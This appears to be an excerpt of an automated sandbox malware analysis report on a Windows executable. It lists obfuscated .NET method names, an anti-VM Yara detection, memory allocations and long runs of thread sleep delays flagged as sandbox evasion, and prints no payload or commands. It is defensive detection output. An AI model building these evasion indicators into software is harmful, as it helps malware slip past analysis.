                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, uQucWedtc7m6UiYPOo.csHigh entropy of concatenated method names: 'tvnFUiRwGd', 'RkfFw6wcnY', 'Jb7FlvuRbe', 'iETFB9d7fK', 'YrIFQiw8XX', 'H9nlPmIucc', 'DnklKTeWMK', 'bl9l1xak2B', 'gqklDcJTvq', 'XSxlrd8Jqj'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, E7VWmfYfPvWACp7p6J.csHigh entropy of concatenated method names: 'wK8ljssXjt', 'RiylG0ScCe', 'TSPxSxXd2t', 'OVVxa5F1Oa', 'z1gxpuUUWc', 'MRIxk2oxaH', 'kkbx9a7Y29', 'PCwxtFYGHo', 'HntxbvqvYF', 'MeZxVJPHEl'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, zo37rSQVkQ5Zi1XDwG.csHigh entropy of concatenated method names: 'jH6NU1CWAj', 'wTONCGh8gw', 'Y9INwcIEdD', 'u0mNxu2TAw', 'oAHNl5EXGI', 'fcNNFhEe20', 'FIeNBg6MJi', 'xCSNQJvrfo', 'm02NRuykp2', 'vMuNOSj35h'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, b5oFPOf2vlQ1ZEjA8v.csHigh entropy of concatenated method names: 'y6JmoyuHl', 'igMI2eKYH', 'uC6TMVY3C', 'CpuGV1qSV', 'xsZsCYrtk', 'z21YYwgrv', 'WGT5CpgNNveMuwfRrZ', 'DK4NrwpojBfip71UpI', 'qO05bjOyn', 'eii8JfH3e'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, VOuXCE97qsitDL1GgQ.csHigh entropy of concatenated method names: 'yoYBCU5Hk0', 't7VBxn38fU', 'EeyBFyc4mr', 'rGMFiwiE2F', 'yNAFzrQbqp', 'jJlByhD116', 'c32BqobNbP', 'RmBBfeS2bJ', 'U8MBNpRZyK', 'c32B4hCMSv'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, b64V8t184eaYoo2HhK.csHigh entropy of concatenated method names: 'Qa0LgRFUMB', 'kAoLnAb7Il', 'a7xLLpTVKr', 'G5yLJtDuj1', 'cihL2Ujtde', 'XMjL031YE0', 'Dispose', 'eVR5CgGZv9', 'Ee85waoFjg', 'DV35xLCKuI'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, LyLaCZip3tWf5ab9h4.csHigh entropy of concatenated method names: 'Hnv8xnJkFA', 'nKn8leLqE3', 'tap8FvyqHN', 'WwW8B3COgG', 'TLV8L0YcN3', 'Fom8QL1YRP', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, AnULCawIAmCoqBP8v9.csHigh entropy of concatenated method names: 'Dispose', 'uaYqroo2Hh', 'suxf3fk9m4', 'eJ7hQugY8e', 'VWKqiFOWBM', 'ab5qzObivJ', 'ProcessDialogKey', 'eErfyMj0lh', 'QosfqjVL5H', 'pupfftyLaC'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, snwcIKZHHh0k4nThpr.csHigh entropy of concatenated method names: 'yrsgVHV0LB', 'IJDgWAXRU6', 'PxHgZ8p30r', 'BACgclYqU9', 'mAmg3Mw9L5', 'to7gSu06S4', 'YeIgaktcrh', 'whjgpeDm5M', 't3ugkCO7D7', 'PfLg92pj0q'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, dQt9iNbukrodAWAhaT.csHigh entropy of concatenated method names: 'PtrBHOwqgF', 'YcdBvtuYFf', 'evZBma2gNQ', 'sIOBIg1s5T', 'cjrBjmq5Gm', 'y5yBTNHmAj', 'SsyBG44iaX', 'l6FB6Yp64h', 'rv7BsQk44q', 'A8NBYm15bZ'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, pQZLLezc6UJDoHSEDY.csHigh entropy of concatenated method names: 'uQa8TXpHbG', 'kMv86L2yVU', 'omS8skbICL', 'LtS8ddA1md', 'jQy83Qqrb6', 'jlH8aZaCYk', 'ABc8pttQ9H', 'hnJ80brbda', 'WLW8HIlnFc', 'mhI8vtyiF6'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, pGwGNUqqWm3APL9IIGA.csHigh entropy of concatenated method names: 'Kda8i1O4Xv', 'v2v8zvFmbf', 'cBJJylL4le', 'wMYJqxaLJF', 'R3dJfNKyLj', 'qToJNfAg9R', 'GpyJ4TXcSZ', 'vqZJUdYDiy', 'RhJJCe7GlN', 'o8VJwTMNQe'
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: XFo9jVGyLQ.exe PID: 7020, type: MEMORYSTR
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMemory allocated: 3190000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMemory allocated: 5190000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMemory allocated: 9590000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMemory allocated: A590000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMemory allocated: A7A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMemory allocated: B7A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMemory allocated: C1A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMemory allocated: D1A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMemory allocated: E1A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMemory allocated: 10C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMemory allocated: 2AA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMemory allocated: 28E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598344Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598219Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598109Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597999Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597880Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597765Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597643Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597528Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597414Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597281Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597172Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597062Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596953Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596844Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596734Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596625Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596515Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596406Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596297Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596187Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596078Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595969Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595856Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595749Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595640Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595531Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595422Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595312Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595202Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595091Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 594984Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 594822Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 594701Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 594589Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 594484Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeWindow / User API: threadDelayed 2146Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeWindow / User API: threadDelayed 7718Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 7044Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 6152Thread sleep count: 2146 > 30Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 6152Thread sleep count: 7718 > 30Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -599765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -599437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -599328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -599219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -599109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -599000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -598890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -598781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -598672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -598562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -598453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -598344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -598219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -598109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -597999s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -597880s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -597765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -597643s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -597528s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -597414s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -597281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -597172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -597062s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -596953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -596844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -596734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -596625s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -596515s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -596406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -596297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -596187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -596078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -595969s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -595856s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -595749s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -595640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -595531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -595422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -595312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -595202s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -595091s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -594984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -594822s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -594701s >= -30000sJump to behavior
